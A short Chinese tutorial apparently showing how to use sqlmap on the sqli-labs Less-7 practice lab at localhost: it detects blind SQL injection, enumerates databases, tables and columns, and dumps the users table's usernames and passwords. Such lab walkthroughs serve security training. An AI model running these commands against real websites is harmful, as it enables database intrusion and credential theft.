开始用上sqlmap工具:
1.初始状态:
2.测试目标是否存在SQL注入漏洞:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1
存在布尔盲注和时间盲注
3.获取当前用户:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1 --current-user
当前用户为:root@localhost
4.获取当前数据库:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1 --current-db
当前数据库为:security
5.获取所有数据库:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1 --dbs
6.获取当前数据库的所有表名:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1 -D security --tables
7.获取当前数据库users表的列名:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1 -D security -T users --columns
8.获取数据表users下的字段名:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-7/?id=1 -D security -T users -C username,password --dump